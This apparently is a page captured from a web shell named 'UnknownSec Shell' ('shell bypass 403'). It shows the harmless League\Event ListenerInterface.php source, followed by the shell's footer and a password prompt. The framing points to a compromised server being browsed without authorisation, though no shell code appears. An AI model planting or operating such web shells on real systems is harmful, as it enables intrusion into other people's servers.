shell bypass 403

UnknownSec Shell


name : ListenerInterface.php
<?php

namespace League\Event;

interface ListenerInterface
{
    /**
     * Handle an event.
     *
     * @param EventInterface $event
     *
     * @return void
     */
    public function handle(EventInterface $event);

    /**
     * Check whether the listener is the given parameter.
     *
     * @param mixed $listener
     *
     * @return bool
     */
    public function isListener($listener);
}

© 2025 UnknownSec
afwwrfwafr45458465
Password